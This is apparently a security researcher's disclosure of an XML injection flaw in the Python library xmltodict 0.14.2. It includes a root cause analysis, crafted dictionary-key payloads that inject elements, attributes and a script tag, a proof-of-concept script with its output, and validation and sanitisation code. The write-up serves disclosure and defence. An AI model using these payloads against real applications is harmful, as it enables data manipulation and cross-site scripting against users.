Executive Summary
I discovered an XML Injection vulnerability in xmltodict version 0.14.2, a popular Python library with over 1.5 million weekly downloads on PyPI. This vulnerability allows attackers to inject arbitrary XML markup through crafted dictionary keys, potentially leading to XML structure manipulation, data corruption, and in web contexts, cross-site scripting (XSS) attacks.
The vulnerability stems from insufficient input validation in the _emit function, where user-controlled dictionary keys are directly used as XML tag names without any sanitization or validation.
Background: Understanding xmltodict
xmltodict is a Python library that provides bidirectional conversion between XML and Python dictionaries. Its primary functions are:
xmltodict.parse()- Converts XML to Python dictionariesxmltodict.unparse()- Converts Python dictionaries back to XML
The library is widely used in web applications, APIs, and data processing pipelines where XML manipulation is required. Its popularity makes this vulnerability particularly concerning from a supply chain security perspective.
Technical Analysis
The Vulnerable Code Path
The vulnerability resides in the _emit function within xmltodict.py (lines 378-451). Let’s examine the critical code path:
def _emit(key, value, content_handler, attr_prefix='@', cdata_key='#text', depth=0, preprocessor=None, pretty=False, newl='\n', indent='\t', namespace_separator=':', namespaces=None, full_document=True, expand_iter=None): key = _process_namespace(key, namespaces, namespace_separator, attr_prefix) if preprocessor is not None: result = preprocessor(key, value) if result is None: return key, value = result # ... processing logic ...
# VULNERABLE LINE: Direct use of user input as XML tag content_handler.startElement(key, AttributesImpl(attrs)) # Line 436
# ... more processing ...
content_handler.endElement(key) # Line 449Root Cause Analysis
The vulnerability occurs because:
- No Input Validation: The
keyparameter (dictionary keys from user input) is used directly as an XML element name - Missing Sanitization: No escaping or validation is performed on the key before passing it to
startElement() - Trust Assumption: The code assumes dictionary keys are safe XML tag names
XML Tag Name Requirements vs Reality
Valid XML tag names must follow these rules:
- Start with a letter or underscore
- Contain only letters, digits, hyphens, periods, and underscores
- Cannot contain spaces or special characters like
<,>,&
The vulnerability exploits the fact that xmltodict doesn’t enforce these constraints.
Exploitation Scenarios
Basic XML Structure Manipulation
Payload:
malicious_data = {"item><injected>malicious content</injected><item": "value"}xml_output = xmltodict.unparse(malicious_data, full_document=False)print(xml_output)Output:
<item><injected>malicious content</injected><item>value</item><injected>malicious content</injected><item>The injected XML breaks the intended structure and introduces arbitrary elements.
Advanced Multi-Stage Injection
Payload:
complex_payload = { "product><price>999999</price><description>HACKED": "legitimate_value", "legitimate_field": "normal_data"}This could manipulate e-commerce XML data by injecting false pricing information.
Web Application Context
In web applications that render XML output in browsers:
Payload:
xss_payload = {"item><script>alert('XSS')</script><item": "data"}When this XML is rendered in a web context without proper escaping, it results in JavaScript execution.
Proof of Concept
Here’s a complete demonstration:
#!/usr/bin/env python3import xmltodict
def demonstrate_xml_injection(): """Demonstrates the XML injection vulnerability"""
print("=== CVE-2025-9375 XML Injection PoC ===\n")
# Test Case 1: Basic structure breaking print("1. Basic XML structure manipulation:") payload1 = {"item><injected>MALICIOUS CONTENT</injected><dummy": "value"} result1 = xmltodict.unparse(payload1, full_document=False) print(f"Input: {payload1}") print(f"Output: {result1}") print()
# Test Case 2: Attribute injection print("2. Attribute injection:") payload2 = {"item attribute='malicious'": "value"} result2 = xmltodict.unparse(payload2, full_document=False) print(f"Input: {payload2}") print(f"Output: {result2}") print()
# Test Case 3: CDATA breaking print("3. CDATA section injection:") payload3 = {"item><![CDATA[]]><script>alert('XSS')</script><dummy": "value"} result3 = xmltodict.unparse(payload3, full_document=False) print(f"Input: {payload3}") print(f"Output: {result3}") print()
if __name__ == "__main__": demonstrate_xml_injection()Expected Output:
=== CVE-2025-9375 XML Injection PoC ===
1. Basic XML structure manipulation:Input: {'item><injected>MALICIOUS CONTENT</injected><dummy': 'value'}Output: <item><injected>MALICIOUS CONTENT</injected><dummy>value</item><injected>MALICIOUS CONTENT</injected><dummy>
2. Attribute injection:Input: {"item attribute='malicious'": 'value'}Output: <item attribute='malicious'>value</item attribute='malicious'>
3. CDATA section injection:Input: {"item><![CDATA[]]><script>alert('XSS')</script><dummy": 'value'}Output: <item><![CDATA[]]><script>alert('XSS')</script><dummy>value</item><![CDATA[]]><script>alert('XSS')</script><dummy>Impact Assessment
Real-World Impact Scenarios
- API Data Corruption: REST APIs using xmltodict for XML responses could have their data structure corrupted
- Configuration File Manipulation: Applications that generate XML config files could be compromised
- Web Application XSS: When XML output is rendered in browsers, XSS attacks become possible
- Data Processing Pipelines: ETL processes could inject malicious data into downstream systems
- Document Generation: PDF or report generators using XML templates could be manipulated
Affected Systems
Any application using xmltodict.unparse() with user-controlled dictionary keys is vulnerable:
- Web APIs converting JSON to XML
- Configuration management systems
- Data transformation pipelines
- Document generation services
- Integration platforms
Mitigation Strategies
- Input Validation: Validate dictionary keys before passing to
unparse()
import redef safe_xml_key(key): # Only allow valid XML name characters return re.match(r'^[a-zA-Z_][a-zA-Z0-9_.-]*$', key) is not None- Key Sanitization: Sanitize keys to remove dangerous characters
def sanitize_dict_keys(data): if isinstance(data, dict): sanitized = {} for key, value in data.items(): # Replace invalid characters safe_key = re.sub(r'[^a-zA-Z0-9_.-]', '_', str(key)) sanitized[safe_key] = sanitize_dict_keys(value) return sanitized return data- Alternative Libraries: Consider using libraries with better input validation.
References: